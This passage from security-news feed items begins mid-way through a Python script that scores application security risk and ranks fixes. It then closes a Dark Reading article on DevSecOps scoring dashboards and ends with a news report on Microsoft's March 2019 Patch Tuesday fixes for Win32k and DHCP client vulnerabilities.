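SERVICE_CREDIT = {"sast": 20, "sca": 20, "dast": 20, "threat_model": 30}
CHAMPION_CREDIT = 40
MIN_SCORE, MAX_SCORE = 300, 850   # the credit-score-like range the article describes
RAW_CAP = 600                      # a weighted net penalty at or above this maps to MIN_SCORE


def criticality_multiplier(level):
    """Crown-jewel apps (5) are judged 1.75x as hard as their raw findings suggest; level 1 gets 0.75x."""
    level = max(1, min(5, level))
    return 0.5 + 0.25 * level


def score(app):
    """Return (score, breakdown). The breakdown lists every term, so a team can audit how the number arose."""
    breakdown = []
    penalty = 0.0
    for sev, count in sorted(app.open_vulns.items()):
        p = SEVERITY_PENALTY.get(sev, 0) * count
        if p:
            breakdown.append((f"{count} open {sev} vulnerability(ies)", -p))
            penalty += p
    if app.dast_findings:
        p = DAST_PENALTY * app.dast_findings
        breakdown.append((f"{app.dast_findings} open DAST finding(s)", -p))
        penalty += p
    if app.pentest_findings:
        p = PENTEST_PENALTY * app.pentest_findings
        breakdown.append((f"{app.pentest_findings} open pentest finding(s)", -p))
        penalty += p
    mult = criticality_multiplier(app.business_criticality)
    weighted = penalty * mult
    breakdown.append((f"business criticality {app.business_criticality} (x{mult:.2f})", round(penalty - weighted, 2)))
    credit = 0
    for svc in sorted(app.security_services):
        c = SERVICE_CREDIT.get(svc, 0)
        if c:
            breakdown.append((f"uses {svc}", c))
            credit += c
    if app.has_champion:
        breakdown.append(("trained security champion on team", CHAMPION_CREDIT))
        credit += CHAMPION_CREDIT
    raw = min(RAW_CAP, max(0.0, weighted - credit))
    final = round(MAX_SCORE - raw / RAW_CAP * (MAX_SCORE - MIN_SCORE))
    return final, breakdown


def improvement_actions(app):
    """Re-score hypothetical changes and rank them by score gain, so the team sees what actually moves the needle."""
    base, _ = score(app)
    candidates = []
    for sev, count in app.open_vulns.items():
        if count:
            fixed = replace(app, open_vulns={**app.open_vulns, sev: 0})
            candidates.append((f"close all {sev} vulnerabilities", score(fixed)[0] - base))
    if app.pentest_findings:
        candidates.append(("close pentest findings", score(replace(app, pentest_findings=0))[0] - base))
    if app.dast_findings:
        candidates.append(("close DAST findings", score(replace(app, dast_findings=0))[0] - base))
    for svc in SERVICE_CREDIT:
        if svc not in app.security_services:
            gain = score(replace(app, security_services=app.security_services | {svc}))[0] - base
            candidates.append((f"adopt {svc}", gain))
    if not app.has_champion:
        candidates.append(("train a security champion", score(replace(app, has_champion=True))[0] - base))
    return sorted((c for c in candidates if c[1] > 0), key=lambda c: -c[1])


# Constructed sample application (not real data): a crown-jewel checkout service with open findings.
CHECKOUT = AppEvidence(
    name="checkout-api", business_criticality=5,
    open_vulns={"critical": 1, "high": 3, "medium": 10},
    dast_findings=2, pentest_findings=1,
    security_services=frozenset({"sast", "sca"}), has_champion=False,
)

if __name__ == "__main__":
    final, terms = score(CHECKOUT)
    print(f"{CHECKOUT.name}: {final}")
    for label, delta in terms:
        print(f"  {delta:+8.2f}  {label}")
    print("Actions ranked by score gain:")
    for label, gain in improvement_actions(CHECKOUT):
        print(f"  +{gain:3d}  {label}")
```

Two design points carry the article’s argument. The breakdown returned beside the score is the transparency Czaplewski describes: a team does not have to trust that it scored 516, it can add up the terms. And because the action list is produced by re-scoring counterfactuals with the same function rather than by a separate rule set, the ranking can never contradict the score, which is what makes it safe to put in front of product owners as the thing to do next.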

This sounds remarkably similar to the approach taken by Larry Maccherone and his team at Comcast. As senior director of DevSecOps transformation for Comcast, Maccherone has led the charge to develop a dashboard tool that visualizes each application team’s progress on a handful of key security practices. He recommends that any security team thinking of using an interactive dashboard as a means of self-assessment and accountability for development teams not get hung up in the minutiae of which key practices to measure but instead pick something and start doing it. Just like DevOps teams iterate with software, security teams should seek to create a minimum viable dashboard and iterate on it as they go along.  

“There are lots of starting points beyond the ones we chose,” he said. “What I want you to focus on here though is how we use this.” 

According to him, it’s all about getting developers, application owners, and executives focused on making incremental changes to the risk posture of their software. One of the most valuable ways that both Comcast and Target are using scoring and dashboarding is to provide senior management with a way to hold product teams and developers accountable for the security of their applications. 

For example, Comcast’s security team trained the company’s president to read the visualization, and engineering leads are now required to bring their scores to their progress meetings with the president about development work.

The more visible the risk is, the more embedded security awareness and improvement becomes within the business culture of an organization. When organizations start to enact the kinds of practices named by DevSecOps leaders at RSAC, good things start to happen organically. 

“It was music to my ears when I walked into a CIO staff meeting a couple weeks ago and heard two officers bantering back and forth about where they were ending up with their scores at the end of the year,” Kautt said, explaining that she’s also seen teams throwing parties when they make their yearly Product Intelligence scoring goals. “Security is now driving the culture, without us asking for any of that.”


Ericka Chickowski specializes in coverage of information technology and business innovation. She has focused on information security for the better part of a decade and regularly writes about the security industry as a contributor to Dark Reading.

Article source: https://www.darkreading.com/application-security/how-the-best-devsecops-teams-make-risk-visible-to-developers/d/d-id/1334138?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Microsoft Patch Tuesday: 64 Vulnerabilities Patched, 2 Under Attack

Seventeen of the vulnerabilities patched today are rated critical, four are publicly known, and two have been exploited in the wild.

Microsoft today rolled out security fixes for 64 security vulnerabilities along with four security advisories.

Of the bugs patched, 17 are rated critical, 45 important, one moderate, and one low in severity. Four vulnerabilities are publicly known; two have been exploited in the wild. This month’s patches cover Microsoft Windows, Office Services and Web Apps, Internet Explorer, Edge, Exchange Server, ChakraCore, the .NET Framework, Team Foundation Server, and the NuGet package manager.

The vulns being used in attacks are two zero-day elevation of privilege vulnerabilities in the Windows Win32k component, both rated important. Neither is remotely exploitable on its own: an attacker who can already run code on the machine uses them to escalate to full system privileges, which is why they are typically chained with an initial-access bug such as a browser exploit.

The first, CVE-2019-0797, was reported by Kaspersky Lab and affects Windows 8, Windows 10, and Windows Server versions 2012, 2016, and 2019. The second, CVE-2019-0808, was reported by the Google Threat Analysis Group. Researchers recently discovered attackers leveraging a Google Chrome vulnerability (CVE-2019-5786) along with the Microsoft flaw to attack systems.

“While bugs in Win32k are rated Important due to the access requirement, the impact of successful attacks shows why they shouldn’t be ignored,” writes Dustin Childs of Trend Micro’s Zero-Day Initiative.

This is the third month in a row in which Microsoft has patched remote code execution bugs in its Windows DHCP components. It started the year in January by fixing CVE-2019-0547 in the Windows DHCP client. In February it released CVE-2019-0626 to patch a memory corruption bug in the Windows DHCP Server service that would let a successful attacker run arbitrary code on a target DHCP server.

Now March brings CVE-2019-0697, CVE-2019-0698, and CVE-2019-0726, all in the DHCP client. Each patch addresses a bug that could let an attacker execute code on a target system, and none of the three, all rated critical, requires user interaction: an attacker positioned to answer a client’s DHCP requests, for example from a rogue DHCP server on the same network segment, could send specially crafted DHCP responses to exploit the bug and gain code execution on the client. Because every Windows machine that obtains an address over DHCP runs the client, the exposure is the whole Windows estate, not just servers.

“There are three Windows DHCP Client Remote Code Execution vulnerabilities with a 9.8 CVSS score in this month’s release,” noted Satnam Narang, senior research engineer at Tenable, who said the continuance of this patching trend signals “increased attention on finding DHCP bugs.”

“Deployment of patches to cover the three RCE vulnerabilities should be prioritized for all Windows systems,” said Jimmy Graham, director of product management for Qualys.

Other critical bugs addressed today exist in Chakra Scripting Engine, VBScript Engine, and Internet Explorer.

The day before it released its latest wave of security fixes, Microsoft announced a new Windows 10 feature that automatically uninstalls recently installed updates when they cause a startup failure because of an incompatibility or another software problem. If this happens, users will see a notification saying “We removed some recently installed updates to recover your device from a startup failure,” says Microsoft.

This step is only taken if all other automatic recovery has proven unsuccessful.


Kelly Sheridan is the Staff Editor at Dark Reading, where she focuses on cybersecurity news and analysis. She is a business technology journalist who previously reported for InformationWeek, where she covered Microsoft, and Insurance Technology, where she covered financial …

Article source: https://www.darkreading.com/threat-intelligence/microsoft-patch-tuesday-64-vulnerabilities-patched-2-under-attack/d/d-id/1334141?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple